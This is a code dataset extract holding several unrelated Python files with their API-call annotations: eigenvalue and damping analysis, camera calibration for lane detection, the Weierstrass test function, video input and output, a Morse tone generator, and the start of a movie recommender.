if Ai.shape[0] != Ai.shape[1]:
raise Exception('Matrices must be square')
if Ai.shape != A[0].shape:
raise Exception('All matrices must have the same shapes');
n = A[0].shape[0]
l = len(A)-1
# Assemble matrices for generalized problem
C = np.block([
[np.zeros((n*(l-1),n)), np.eye(n*(l-1))],
[-np.column_stack( A[0:-1])]
])
D = np.block([
[np.eye(n*(l-1)), np.zeros((n*(l-1), n))],
[np.zeros((n, n*(l-1))), A[-1] ]
]);
# Solve generalized eigenvalue problem
e, X = linalg.eig(C, D);
if np.all(np.isreal(e)):
e=np.real(e)
X=X[:n,:]
# Sort eigen values
#I = np.argsort(e)
#X = X[:,I]
#e = e[I]
# Scaling each mode by max
X /= np.tile(np.max(np.abs(X),axis=0), (n,1))
return X, e
def eig(K,M=None, freq_out=False, sort=True):
""" performs eigenvalue analysis and return same values as matlab
returns:
Q : matrix of column eigenvectors
Lambda: matrix where diagonal values are eigenvalues
frequency = np.sqrt(np.diag(Lambda))/(2*np.pi)
or
frequencies (if freq_out is True)
"""
if M is not None:
D,Q = linalg.eig(K,M)
else:
D,Q = linalg.eig(K)
# --- rescaling TODO, this can be made smarter
if M is not None:
for j in range(M.shape[1]):
q_j = Q[:,j]
modalmass_j = np.dot(q_j.T,M).dot(q_j)
Q[:,j]= Q[:,j]/np.sqrt(modalmass_j)
Lambda=np.dot(Q.T,K).dot(Q)
lambdaDiag=np.diag(Lambda) # Note lambda might have off diganoal values due to numerics
I = np.argsort(lambdaDiag)
# Sorting eigen values
if sort:
Q = Q[:,I]
lambdaDiag = lambdaDiag[I]
if freq_out:
Lambda = np.sqrt(lambdaDiag)/(2*np.pi) # frequencies [Hz]
else:
Lambda = np.diag(lambdaDiag) # enforcing purely diagonal
else:
Lambda = np.diag(D)
return Q,Lambda
def eigA(A, nq=None, nq1=None, fullEV=False):
"""
Perform eigenvalue analysis on a "state" matrix A
where states are assumed to be ordered as {q, q_dot, q1}
This order is only relevant for returning the eigenvectors.
INPUTS:
- A : square state matrix
- nq: number of second order states, optional, relevant if fullEV is False
- nq1: number of first order states, optional, relevant if fullEV is False
- fullEV: if True, the entire eigenvectors are returned, otherwise,
only the part associated with q and q1 are returned
OUPUTS:
- freq_d: damped frequencies [Hz]
- zeta : damping ratios [-]
- Q : column eigenvectors
- freq_0: natural frequencies [Hz]
"""
n,m = A.shape
if m!=n:
raise Exception('Matrix needs to be squared')
if nq is None:
if nq1 is None:
nq1=0
nq = int((n-nq1)/2)
else:
nq1 = n-2*nq
if n!=2*nq+nq1 or nq1<0:
raise Exception('Number of 1st and second order dofs should match the matrix shape (n= 2*nq + nq1')
Q, Lambda = eig(A, sort=False)
v = np.diag(Lambda)
if not fullEV:
Q=np.delete(Q, slice(nq,2*nq), axis=0)
# Selecting eigenvalues with positive imaginary part (frequency)
Ipos = np.imag(v)>0
Q = Q[:,Ipos]
v = v[Ipos]
# Frequencies and damping based on compled eigenvalues
omega_0 = np.abs(v) # natural cylic frequency [rad/s]
freq_d = np.imag(v)/(2*np.pi) # damped frequency [Hz]
zeta = - np.real(v)/omega_0 # damping ratio
freq_0 = omega_0/(2*np.pi) # natural frequency [Hz]
# Sorting
I = np.argsort(freq_0)
freq_d = freq_d[I]
freq_0 = freq_0[I]
zeta = zeta[I]
Q = Q[:,I]
return freq_d, zeta, Q, freq_0
def eigMCK(M, C, K, method='diag_beta'):
""" """
if method.lower()=='diag_beta':
## using K, M and damping assuming diagonal beta matrix (Rayleigh Damping)
Q, Lambda = eig(K,M, sort=False) # provide scaled EV, important, no sorting here!
freq = np.sqrt(np.diag(Lambda))/(2*np.pi)
betaMat = np.dot(Q,C).dot(Q.T)
xi = (np.diag(betaMat)*np.pi/(2*np.pi*freq))
xi[xi>2*np.pi] = np.NAN
zeta = xi/(2*np.pi)
freq_d = freq*np.sqrt(1-zeta**2)
# Sorting here
I = np.argsort(freq_d)
freq = freq[I]
freq_d = freq_d[I]
zeta = zeta[I]
xi = xi[I]
Q = Q[:,I]
# return Q, Lambda,freq, betaMat,xi,zeta
elif method.lower()=='full_matrix':
## Method 2 - Damping based on K, M and full D matrix
Q,e = polyeig(K,C,M)
#omega0 = np.abs(e)
zeta = - np.real(e) / np.abs(e)
freq_d = np.imag(e) / (2*np.pi)
# Sorting
I = np.argsort(freq_d)
freq_d = freq_d[I]
zeta = zeta[I]
Q = Q[:,I]
# Keeping only positive frequencies
bValid = freq_d > 1e-08
freq_d = freq_d[bValid]
zeta = zeta[bValid]
Q = Q[:,bValid]
# Undamped frequency and pseudo log dec
freq = freq_d / np.sqrt(1 - zeta**2)
xi = 2 * np.pi * zeta
# logdec2 = 2*pi*dampratio_sorted./sqrt(1-dampratio_sorted.^2);
else:
raise NotImplementedError()
return freq_d,zeta,Q,freq,xi
if __name__=='__main__':
np.set_printoptions(linewidth=300, precision=4)
nDOF = 2
M = np.zeros((nDOF,nDOF))
K = np.zeros((nDOF,nDOF))
C = np.zeros((nDOF,nDOF))
M[0,0] = 430000;
M[1,1] = 42000000;
C[0,0] = 7255;
C[1,1] = M[1,1]*0.001;
K[0,0] = 2700000.;
K[1,1] = 200000000.;
freq_d, zeta, Q, freq, xi = eigMCK(M,C,K)
print(freq_d)
print(Q)
#M = diag([3,0,0,0], [0, 1,0,0], [0,0,3,0],[0,0,0, 1])
M = np.diag([3,1,3,1])
C = np.array([[0.4 , 0 , -0.3 , 0] , [0 , 0 , 0 , 0] , [-0.3 , 0 , 0.5 , -0.2 ] , [ 0 , 0 , -0.2 , 0.2]])
K = np.array([[-7 , 2 , 4 , 0] , [2 , -4 , 2 , 0] , [4 , 2 , -9 , 3 ] , [ 0 , 0 , 3 , -3]])
X,e = polyeig(K,C,M)
print('X:\n',X)
print('e:\n',e)
# Test taht first eigenvector and valur satisfy eigenvalue problem:
s = e[0];
x = X[:,0];
res = (M*s**2 + C*s + K).dot(x) # residuals
assert(np.all(np.abs(res)<1e-12))
| [
"numpy.set_printoptions",
"numpy.abs",
"numpy.isreal",
"numpy.eye",
"numpy.zeros",
"scipy.linalg.eig",
"numpy.argsort",
"numpy.imag",
"numpy.array",
"numpy.real",
"numpy.column_stack",
"numpy.dot",
"numpy.diag",
"numpy.sqrt"
] | [((1229, 1245), 'scipy.linalg.eig', 'linalg.eig', (['C', 'D'], {}), '(C, D)\n', (1239, 1245), False, 'from scipy import linalg\n'), ((3822, 3837), 'numpy.diag', 'np.diag', (['Lambda'], {}), '(Lambda)\n', (3829, 3837), True, 'import numpy as np\n'), ((4107, 4116), 'numpy.abs', 'np.abs', (['v'], {}), '(v)\n', (4113, 4116), True, 'import numpy as np\n'), ((4363, 4381), 'numpy.argsort', 'np.argsort', (['freq_0'], {}), '(freq_0)\n', (4373, 4381), True, 'import numpy as np\n'), ((6110, 6157), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'linewidth': '(300)', 'precision': '(4)'}), '(linewidth=300, precision=4)\n', (6129, 6157), True, 'import numpy as np\n'), ((6186, 6208), 'numpy.zeros', 'np.zeros', (['(nDOF, nDOF)'], {}), '((nDOF, nDOF))\n', (6194, 6208), True, 'import numpy as np\n'), ((6221, 6243), 'numpy.zeros', 'np.zeros', (['(nDOF, nDOF)'], {}), '((nDOF, nDOF))\n', (6229, 6243), True, 'import numpy as np\n'), ((6256, 6278), 'numpy.zeros', 'np.zeros', (['(nDOF, nDOF)'], {}), '((nDOF, nDOF))\n', (6264, 6278), True, 'import numpy as np\n'), ((6563, 6584), 'numpy.diag', 'np.diag', (['[3, 1, 3, 1]'], {}), '([3, 1, 3, 1])\n', (6570, 6584), True, 'import numpy as np\n'), ((6590, 6679), 'numpy.array', 'np.array', (['[[0.4, 0, -0.3, 0], [0, 0, 0, 0], [-0.3, 0, 0.5, -0.2], [0, 0, -0.2, 0.2]]'], {}), '([[0.4, 0, -0.3, 0], [0, 0, 0, 0], [-0.3, 0, 0.5, -0.2], [0, 0, -\n 0.2, 0.2]])\n', (6598, 6679), True, 'import numpy as np\n'), ((6701, 6771), 'numpy.array', 'np.array', (['[[-7, 2, 4, 0], [2, -4, 2, 0], [4, 2, -9, 3], [0, 0, 3, -3]]'], {}), '([[-7, 2, 4, 0], [2, -4, 2, 0], [4, 2, -9, 3], [0, 0, 3, -3]])\n', (6709, 6771), True, 'import numpy as np\n'), ((1261, 1273), 'numpy.isreal', 'np.isreal', (['e'], {}), '(e)\n', (1270, 1273), True, 'import numpy as np\n'), ((1286, 1296), 'numpy.real', 'np.real', (['e'], {}), '(e)\n', (1293, 1296), True, 'import numpy as np\n'), ((1881, 1897), 'scipy.linalg.eig', 'linalg.eig', (['K', 'M'], {}), '(K, M)\n', (1891, 1897), False, 'from scipy import linalg\n'), ((1921, 1934), 'scipy.linalg.eig', 'linalg.eig', (['K'], {}), '(K)\n', (1931, 1934), False, 'from scipy import linalg\n'), ((2223, 2238), 'numpy.diag', 'np.diag', (['Lambda'], {}), '(Lambda)\n', (2230, 2238), True, 'import numpy as np\n'), ((2312, 2334), 'numpy.argsort', 'np.argsort', (['lambdaDiag'], {}), '(lambdaDiag)\n', (2322, 2334), True, 'import numpy as np\n'), ((2655, 2665), 'numpy.diag', 'np.diag', (['D'], {}), '(D)\n', (2662, 2665), True, 'import numpy as np\n'), ((3986, 3996), 'numpy.imag', 'np.imag', (['v'], {}), '(v)\n', (3993, 3996), True, 'import numpy as np\n'), ((4178, 4188), 'numpy.imag', 'np.imag', (['v'], {}), '(v)\n', (4185, 4188), True, 'import numpy as np\n'), ((5082, 5100), 'numpy.argsort', 'np.argsort', (['freq_d'], {}), '(freq_d)\n', (5092, 5100), True, 'import numpy as np\n'), ((1445, 1454), 'numpy.abs', 'np.abs', (['X'], {}), '(X)\n', (1451, 1454), True, 'import numpy as np\n'), ((2580, 2599), 'numpy.diag', 'np.diag', (['lambdaDiag'], {}), '(lambdaDiag)\n', (2587, 2599), True, 'import numpy as np\n'), ((4241, 4251), 'numpy.real', 'np.real', (['v'], {}), '(v)\n', (4248, 4251), True, 'import numpy as np\n'), ((5028, 5050), 'numpy.sqrt', 'np.sqrt', (['(1 - zeta ** 2)'], {}), '(1 - zeta ** 2)\n', (5035, 5050), True, 'import numpy as np\n'), ((5543, 5561), 'numpy.argsort', 'np.argsort', (['freq_d'], {}), '(freq_d)\n', (5553, 5561), True, 'import numpy as np\n'), ((7037, 7048), 'numpy.abs', 'np.abs', (['res'], {}), '(res)\n', (7043, 7048), True, 'import numpy as np\n'), ((954, 980), 'numpy.zeros', 'np.zeros', (['(n * (l - 1), n)'], {}), '((n * (l - 1), n))\n', (962, 980), True, 'import numpy as np\n'), ((977, 996), 'numpy.eye', 'np.eye', (['(n * (l - 1))'], {}), '(n * (l - 1))\n', (983, 996), True, 'import numpy as np\n'), ((1071, 1090), 'numpy.eye', 'np.eye', (['(n * (l - 1))'], {}), '(n * (l - 1))\n', (1077, 1090), True, 'import numpy as np\n'), ((1088, 1114), 'numpy.zeros', 'np.zeros', (['(n * (l - 1), n)'], {}), '((n * (l - 1), n))\n', (1096, 1114), True, 'import numpy as np\n'), ((1122, 1148), 'numpy.zeros', 'np.zeros', (['(n, n * (l - 1))'], {}), '((n, n * (l - 1)))\n', (1130, 1148), True, 'import numpy as np\n'), ((2147, 2167), 'numpy.sqrt', 'np.sqrt', (['modalmass_j'], {}), '(modalmass_j)\n', (2154, 2167), True, 'import numpy as np\n'), ((2183, 2197), 'numpy.dot', 'np.dot', (['Q.T', 'K'], {}), '(Q.T, K)\n', (2189, 2197), True, 'import numpy as np\n'), ((2496, 2515), 'numpy.sqrt', 'np.sqrt', (['lambdaDiag'], {}), '(lambdaDiag)\n', (2503, 2515), True, 'import numpy as np\n'), ((4802, 4817), 'numpy.diag', 'np.diag', (['Lambda'], {}), '(Lambda)\n', (4809, 4817), True, 'import numpy as np\n'), ((4851, 4863), 'numpy.dot', 'np.dot', (['Q', 'C'], {}), '(Q, C)\n', (4857, 4863), True, 'import numpy as np\n'), ((4895, 4911), 'numpy.diag', 'np.diag', (['betaMat'], {}), '(betaMat)\n', (4902, 4911), True, 'import numpy as np\n'), ((5463, 5472), 'numpy.abs', 'np.abs', (['e'], {}), '(e)\n', (5469, 5472), True, 'import numpy as np\n'), ((5490, 5500), 'numpy.imag', 'np.imag', (['e'], {}), '(e)\n', (5497, 5500), True, 'import numpy as np\n'), ((5877, 5899), 'numpy.sqrt', 'np.sqrt', (['(1 - zeta ** 2)'], {}), '(1 - zeta ** 2)\n', (5884, 5899), True, 'import numpy as np\n'), ((1005, 1029), 'numpy.column_stack', 'np.column_stack', (['A[0:-1]'], {}), '(A[0:-1])\n', (1020, 1029), True, 'import numpy as np\n'), ((2095, 2111), 'numpy.dot', 'np.dot', (['q_j.T', 'M'], {}), '(q_j.T, M)\n', (2101, 2111), True, 'import numpy as np\n'), ((5450, 5460), 'numpy.real', 'np.real', (['e'], {}), '(e)\n', (5457, 5460), True, 'import numpy as np\n')] |
import numpy as np
# from ..lane_detection.lane_detector import LaneDetector
# from ..lane_detection.camera_geometry import CameraGeometry
import sys
sys.path.append('../../code')
from solutions.lane_detection.lane_detector import LaneDetector
from solutions.lane_detection.camera_geometry import CameraGeometry
def get_intersection(line1, line2):
#TODO final test
m1, c1 = line1
m2, c2 = line2
x = (c2-c1)/(m1-m2)
y = m1*x+c1
return x, y
def get_py_from_vp(u_i, v_i, K):
#TODO final test
K_inverse = np.linalg.inv(K)
x = np.dot(K_inverse, np.transpose(np.array([[u_i,v_i,1]])))
x_mag = np.linalg.norm(x)
r3 = x/x_mag
pitch = np.arcsin(r3[1].item())
yaw = -np.arctan(r3[0].item()/r3[2].item())
return pitch, yaw
class CalibratedLaneDetector(LaneDetector):
def __init__(self, calib_cut_v = 200, cam_geom=CameraGeometry(), model_path='./fastai_model.pth'):
# call parent class constructor
super().__init__(cam_geom, model_path)
#TODO: what is calib_cut_v?
self.calib_cut_v = calib_cut_v
self.estimated_pitch_deg = 0
self.estimated_yaw_deg = 0
self.update_cam_geometry()
self.mean_residuals_thresh = 10.0 #TODO: adjust this thresh hold to avoid calibration process at curves.
self.pitch_yaw_history = []
self.calibration_success = False
def update_pitch_yaw_history(self, pitch, yaw):
self.pitch_yaw_history.append([pitch, yaw])
average = lambda lst: np.rad2deg(np.sum(lst, axis=0))/len(lst)
if len(self.pitch_yaw_history)==100:
self.pitch_yaw_history = np.array(self.pitch_yaw_history) # create the numpy array as this is more efficient
self.estimated_pitch_deg, self.estimated_yaw_deg = average(self.pitch_yaw_history)
self.pitch_yaw_history = [] # use python array because it has in-place appending
self.update_cam_geometry()
def get_fit_and_probs(self, image):
# returns the inference result from the neural network model
_, left_probs, right_probs = self.detect(image)
line_left = self._fit_line_v_of_u(left_probs)
line_right = self._fit_line_v_of_u(right_probs)
if (line_left is not None) and (line_right is not None):
u_i, v_i = get_intersection(line_left, line_right)
pitch, yaw = get_py_from_vp(u_i, v_i, self.cg.intrinsic_matrix)
self.update_pitch_yaw_history(pitch, yaw)
left_poly = self.fit_poly(left_probs)
right_poly = self.fit_poly(right_probs)
return left_poly, right_poly, left_probs, right_probs
def _fit_line_v_of_u(self, probs):
v_list, u_list = np.nonzero(probs > 0.3)
if v_list.size == 0:
return None
coeffs, residuals, _, _, _= np.polyfit(
u_list, v_list, deg=1, full=True)
mean_residuals = residuals/len(u_list)
if mean_residuals > self.mean_residuals_thresh:
return None
else:
return np.poly1d(coeffs)
def update_cam_geometry(self):
self.cg = CameraGeometry(
height = self.cg.height,
roll_deg = self.cg.roll_deg,
image_width = self.cg.image_width,
image_height = self.cg.image_height,
field_of_view_deg = self.cg.field_of_view_deg,
pitch_deg = self.estimated_pitch_deg,
yaw_deg = self.estimated_yaw_deg )
self.cut_v, self.grid = self.cg.precompute_grid()
| [
"sys.path.append",
"numpy.poly1d",
"numpy.sum",
"numpy.polyfit",
"numpy.nonzero",
"numpy.linalg.norm",
"numpy.linalg.inv",
"numpy.array",
"solutions.lane_detection.camera_geometry.CameraGeometry"
] | [((154, 183), 'sys.path.append', 'sys.path.append', (['"""../../code"""'], {}), "('../../code')\n", (169, 183), False, 'import sys\n'), ((555, 571), 'numpy.linalg.inv', 'np.linalg.inv', (['K'], {}), '(K)\n', (568, 571), True, 'import numpy as np\n'), ((651, 668), 'numpy.linalg.norm', 'np.linalg.norm', (['x'], {}), '(x)\n', (665, 668), True, 'import numpy as np\n'), ((904, 920), 'solutions.lane_detection.camera_geometry.CameraGeometry', 'CameraGeometry', ([], {}), '()\n', (918, 920), False, 'from solutions.lane_detection.camera_geometry import CameraGeometry\n'), ((2800, 2823), 'numpy.nonzero', 'np.nonzero', (['(probs > 0.3)'], {}), '(probs > 0.3)\n', (2810, 2823), True, 'import numpy as np\n'), ((2916, 2960), 'numpy.polyfit', 'np.polyfit', (['u_list', 'v_list'], {'deg': '(1)', 'full': '(True)'}), '(u_list, v_list, deg=1, full=True)\n', (2926, 2960), True, 'import numpy as np\n'), ((3215, 3473), 'solutions.lane_detection.camera_geometry.CameraGeometry', 'CameraGeometry', ([], {'height': 'self.cg.height', 'roll_deg': 'self.cg.roll_deg', 'image_width': 'self.cg.image_width', 'image_height': 'self.cg.image_height', 'field_of_view_deg': 'self.cg.field_of_view_deg', 'pitch_deg': 'self.estimated_pitch_deg', 'yaw_deg': 'self.estimated_yaw_deg'}), '(height=self.cg.height, roll_deg=self.cg.roll_deg,\n image_width=self.cg.image_width, image_height=self.cg.image_height,\n field_of_view_deg=self.cg.field_of_view_deg, pitch_deg=self.\n estimated_pitch_deg, yaw_deg=self.estimated_yaw_deg)\n', (3229, 3473), False, 'from solutions.lane_detection.camera_geometry import CameraGeometry\n'), ((612, 637), 'numpy.array', 'np.array', (['[[u_i, v_i, 1]]'], {}), '([[u_i, v_i, 1]])\n', (620, 637), True, 'import numpy as np\n'), ((1698, 1730), 'numpy.array', 'np.array', (['self.pitch_yaw_history'], {}), '(self.pitch_yaw_history)\n', (1706, 1730), True, 'import numpy as np\n'), ((3140, 3157), 'numpy.poly1d', 'np.poly1d', (['coeffs'], {}), '(coeffs)\n', (3149, 3157), True, 'import numpy as np\n'), ((1584, 1603), 'numpy.sum', 'np.sum', (['lst'], {'axis': '(0)'}), '(lst, axis=0)\n', (1590, 1603), True, 'import numpy as np\n')] |
# encoding=utf8
"""Implementations of Weierstrass functions."""
import numpy as np
from niapy.problems.problem import Problem
__all__ = ['Weierstrass']
class Weierstrass(Problem):
r"""Implementations of Weierstrass functions.
Date: 2018
Author: <NAME>
License: MIT
Function:
**Weierstrass Function**
:math:`f(\textbf{x}) = \sum_{i=1}^D \left( \sum_{k=0}^{k_{max}} a^k \cos\left( 2 \pi b^k ( x_i + 0.5) \right) \right) - D \sum_{k=0}^{k_{max}} a^k \cos \left( 2 \pi b^k \cdot 0.5 \right)`
**Input domain:**
The function can be defined on any input domain but it is usually
evaluated on the hypercube :math:`x_i ∈ [-100, 100]`, for all :math:`i = 1, 2,..., D`.
Default value of a = 0.5, b = 3 and k_max = 20.
**Global minimum:** :math:`f(x^*) = 0`, at :math:`x^* = (420.968746,...,420.968746)`
LaTeX formats:
Inline:
$$f(\textbf{x}) = \sum_{i=1}^D \left( \sum_{k=0}^{k_{max}} a^k \cos\left( 2 \pi b^k ( x_i + 0.5) \right) \right) - D \sum_{k=0}^{k_{max}} a^k \cos \left( 2 \pi b^k \cdot 0.5 \right)
Equation:
\begin{equation} f(\textbf{x}) = \sum_{i=1}^D \left( \sum_{k=0}^{k_{max}} a^k \cos\left( 2 \pi b^k ( x_i + 0.5) \right) \right) - D \sum_{k=0}^{k_{max}} a^k \cos \left( 2 \pi b^k \cdot 0.5 \right) \end{equation}
Domain:
$-100 \leq x_i \leq 100$
Reference:
http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
"""
def __init__(self, dimension=4, lower=-100.0, upper=100.0, a=0.5, b=3, k_max=20, *args, **kwargs):
r"""Initialize Bent Cigar problem..
Args:
dimension (Optional[int]): Dimension of the problem.
lower (Optional[Union[float, Iterable[float]]]): Lower bounds of the problem.
upper (Optional[Union[float, Iterable[float]]]): Upper bounds of the problem.
a (Optional[float]): The a parameter.
b (Optional[float]): The b parameter.
k_max (Optional[int]): Number of elements of the series to compute.
See Also:
:func:`niapy.problems.Problem.__init__`
"""
super().__init__(dimension, lower, upper, *args, **kwargs)
self.a = a
self.b = b
self.k_max = k_max
@staticmethod
def latex_code():
r"""Return the latex code of the problem.
Returns:
str: Latex code.
"""
return r'''$f(\textbf{x}) = \sum_{i=1}^D \left( \sum_{k=0}^{k_{max}} a^k \cos\left( 2 \pi b^k ( x_i + 0.5) \right) \right) - D \sum_{k=0}^{k_{max}} a^k \cos \left( 2 \pi b^k \cdot 0.5 \right)$'''
def _evaluate(self, x):
val1 = 0.0
for i in range(self.dimension):
val = 0.0
for k in range(self.k_max):
val += self.a ** k * np.cos(2.0 * np.pi * self.b ** k * (x[i] + 0.5))
val1 += val
val2 = 0.0
for k in range(self.k_max):
val2 += self.a ** k * np.cos(2 * np.pi * self.b ** k * 0.5)
return val1 - self.dimension * val2
# vim: tabstop=3 noexpandtab shiftwidth=3 softtabstop=3
| [
"numpy.cos"
] | [((3029, 3066), 'numpy.cos', 'np.cos', (['(2 * np.pi * self.b ** k * 0.5)'], {}), '(2 * np.pi * self.b ** k * 0.5)\n', (3035, 3066), True, 'import numpy as np\n'), ((2867, 2915), 'numpy.cos', 'np.cos', (['(2.0 * np.pi * self.b ** k * (x[i] + 0.5))'], {}), '(2.0 * np.pi * self.b ** k * (x[i] + 0.5))\n', (2873, 2915), True, 'import numpy as np\n')] |
import warnings
from typing import Optional
import cv2
import numpy as np
from utils.tools import TimerBlock
class VideoData:
def __init__(self, frames, fps, is_rgb=True):
self.frames = np.array(frames)
self.fps = fps
self.height, self.width = self.frames.shape[-2:] if self.is_nchw else self.frames.shape[1:-1]
self.is_rgb = is_rgb
def __iter__(self):
return iter(self.frames)
def __len__(self):
return len(self.frames)
@property
def num_frames(self):
return len(self.frames)
@property
def shape(self):
return self.height, self.width
@property
def is_nchw(self):
return (self.frames.shape[1] == 3 or self.frames.shape[1] == 1) and self.frames.shape[1] <= self.frames.shape[3]
def to_nchw(self):
if self.is_nchw:
return VideoData(self.frames.copy(), self.fps)
else:
return VideoData(self.frames.transpose((0, 3, 1, 2)), self.fps)
# TODO: Refactor this method to be a static member of the VideoData class.
def read_video(video_path, logger: Optional[TimerBlock] = None, convert_to_rgb=True):
"""
Read a video from a file.
:param video_path: The path to the video file.
:param logger: The `TimedBlock` object used for handling log output.
:param convert_to_rgb: Whether to convert the colour channel order to RGB from BGR (this is the default for OpenCV).
:return: The video wrapped in a `VideoData` object.
"""
close_logger_on_exit = False
if logger is None:
logger = TimerBlock("Reading Video")
logger.__enter__()
close_logger_on_exit = True
input_video = cv2.VideoCapture(video_path)
if not input_video.isOpened():
raise RuntimeError("Could not open video from the path {}.".format(video_path))
logger.log("Opened video from the path {}.".format(video_path))
frames = []
while input_video.isOpened():
has_frame, frame = input_video.read()
if not has_frame:
break
if convert_to_rgb:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frames.append(frame)
logger.log("Extracted {:,d} video frames.\r".format(len(frames)), end="")
print()
width = int(input_video.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(input_video.get(cv2.CAP_PROP_FRAME_HEIGHT))
logger.log("Frame dimensions: {}x{}.".format(width, height))
fps = input_video.get(cv2.CAP_PROP_FPS)
logger.log("Frames per second: {}.".format(fps))
if input_video.isOpened():
input_video.release()
if close_logger_on_exit:
logger.__exit__(None, None, None)
return VideoData(frames, fps, is_rgb=convert_to_rgb)
def write_video(video_data, video_output_path, logger: Optional[TimerBlock] = None):
close_logger_on_exit = False
if logger is None:
logger = TimerBlock("Writing Video")
logger.__enter__()
close_logger_on_exit = True
fourcc = cv2.VideoWriter_fourcc(*"DIVX")
video_writer = cv2.VideoWriter(video_output_path, fourcc, video_data.fps, (video_data.width, video_data.height))
frames = video_data.frames
if frames.shape[1] == 1:
warnings.warn("Was given input with one colour channel, stacking frames to get three channels.")
frames = np.concatenate([frames] * 3, axis=1)
assert frames.shape[1] == 3, \
"Video must be in NCHW format and be RGB (i.e. C=3). Got {} shaped input.".format(frames.shape)
assert frames.dtype == np.uint8, "Frames must be uint8, got {}.".format(frames.dtype)
for i, frame in enumerate(frames):
video_writer.write(frame.transpose((1, 2, 0)))
logger.log("Wrote {}/{} frames.\r".format(i + 1, len(frames)), end="")
print()
video_writer.release()
logger.log("Wrote video to {}.".format(video_output_path))
if close_logger_on_exit:
logger.__exit__(None, None, None)
| [
"cv2.VideoWriter_fourcc",
"cv2.cvtColor",
"cv2.VideoCapture",
"numpy.array",
"cv2.VideoWriter",
"warnings.warn",
"utils.tools.TimerBlock",
"numpy.concatenate"
] | [((1688, 1716), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video_path'], {}), '(video_path)\n', (1704, 1716), False, 'import cv2\n'), ((3008, 3039), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'DIVX'"], {}), "(*'DIVX')\n", (3030, 3039), False, 'import cv2\n'), ((3059, 3161), 'cv2.VideoWriter', 'cv2.VideoWriter', (['video_output_path', 'fourcc', 'video_data.fps', '(video_data.width, video_data.height)'], {}), '(video_output_path, fourcc, video_data.fps, (video_data.\n width, video_data.height))\n', (3074, 3161), False, 'import cv2\n'), ((202, 218), 'numpy.array', 'np.array', (['frames'], {}), '(frames)\n', (210, 218), True, 'import numpy as np\n'), ((1578, 1605), 'utils.tools.TimerBlock', 'TimerBlock', (['"""Reading Video"""'], {}), "('Reading Video')\n", (1588, 1605), False, 'from utils.tools import TimerBlock\n'), ((2903, 2930), 'utils.tools.TimerBlock', 'TimerBlock', (['"""Writing Video"""'], {}), "('Writing Video')\n", (2913, 2930), False, 'from utils.tools import TimerBlock\n'), ((3226, 3332), 'warnings.warn', 'warnings.warn', (['"""Was given input with one colour channel, stacking frames to get three channels."""'], {}), "(\n 'Was given input with one colour channel, stacking frames to get three channels.'\n )\n", (3239, 3332), False, 'import warnings\n'), ((3340, 3376), 'numpy.concatenate', 'np.concatenate', (['([frames] * 3)'], {'axis': '(1)'}), '([frames] * 3, axis=1)\n', (3354, 3376), True, 'import numpy as np\n'), ((2101, 2139), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2RGB'], {}), '(frame, cv2.COLOR_BGR2RGB)\n', (2113, 2139), False, 'import cv2\n')] |
#!/usr/bin/python3 -d
import numpy as np
import simpleaudio as sa
class Didah:
FS = 44100 # samples per second
NUM_CHANNELS = 1
BYTES_PER_SAMPLE = 2
dit_sound = None
dah_sound = None
space_sound = None
letter_space_sound = None
word_space_sound = None
def generate_tone(self, dur, freq):
# Generate array with seconds*sample_rate steps between 0 and seconds
t = np.linspace(0, dur, int(dur * Didah.FS), False)
# Generate sine wave for frequency
note = np.sin(freq * t * 2 * np.pi)
# Ensure that highest value is in 16-bit range
audio = note * (2**15 - 1) / np.max(np.abs(note))
# Convert to 16-bit data
audio = audio.astype(np.int16)
return audio
def generate_silence(self, dur):
silence = np.zeros((int(Didah.FS*dur), 2))
silence = silence.astype(np.int16)
return silence
def play_tone(self, audio):
# Start playback
play_obj = sa.play_buffer(audio, Didah.NUM_CHANNELS,
Didah.BYTES_PER_SAMPLE, Didah.FS)
# Wait for playback to finish before exiting
play_obj.wait_done()
def dit(self):
self.play_tone(Didah.dit_sound)
def dah(self):
self.play_tone(Didah.dah_sound)
def space(self):
self.play_tone(Didah.space_sound)
def letter_space(self):
self.play_tone(Didah.letter_space_sound)
def word_space(self):
self.play_tone(Didah.word_space_sound)
def __init__(self, freq=440, wpm=25):
self.freq = freq
dit_dur = 6.0 / (5.0 * wpm)
dah_dur = dit_dur * 3
space_dur = dit_dur
letter_space_dur = dit_dur * 3
word_space_dur = dit_dur * 7
#print("wpm:" + str(wpm)
#+ ", dit:" + str(dit_dur)
#+ ", dah:" + str(dah_dur)
#+ ", space:" + str(space_dur)
#+ ", letter:" + str(letter_space_dur)
#+ ", word:" + str(word_space_dur))
Didah.dit_sound = self.generate_tone(dit_dur, freq)
Didah.dah_sound = self.generate_tone(dah_dur, freq)
Didah.space_sound = self.generate_silence(space_dur)
Didah.letter_space_sound = self.generate_silence(letter_space_dur)
Didah.word_space_sound = self.generate_silence(word_space_dur)
if __name__ == "__main__":
cw = Didah()
cw.dit()
cw.space()
cw.dit()
cw.space()
cw.dit()
cw.letter_space()
cw.dah()
cw.space()
cw.dah()
cw.space()
cw.dah()
cw.letter_space()
cw.dit()
cw.space()
cw.dit()
cw.space()
cw.dit()
cw.word_space()
| [
"numpy.abs",
"numpy.sin",
"simpleaudio.play_buffer"
] | [((527, 555), 'numpy.sin', 'np.sin', (['(freq * t * 2 * np.pi)'], {}), '(freq * t * 2 * np.pi)\n', (533, 555), True, 'import numpy as np\n'), ((996, 1071), 'simpleaudio.play_buffer', 'sa.play_buffer', (['audio', 'Didah.NUM_CHANNELS', 'Didah.BYTES_PER_SAMPLE', 'Didah.FS'], {}), '(audio, Didah.NUM_CHANNELS, Didah.BYTES_PER_SAMPLE, Didah.FS)\n', (1010, 1071), True, 'import simpleaudio as sa\n'), ((656, 668), 'numpy.abs', 'np.abs', (['note'], {}), '(note)\n', (662, 668), True, 'import numpy as np\n')] |
"""
INTERFACE
- movies with shape (#number of movies, #features(title, year, genres, ...))
- user_item_matrix with shape (#number of users, #number of movies)
- top_list with shape (#number of movies, 2)
- item-item matrix with shape (#number of popular movies, #number of popular movies)
- nmf_model: trained sklearn NMF model
"""
import pandas as pd
import numpy as np
from fuzzywuzzy import process
import pickle
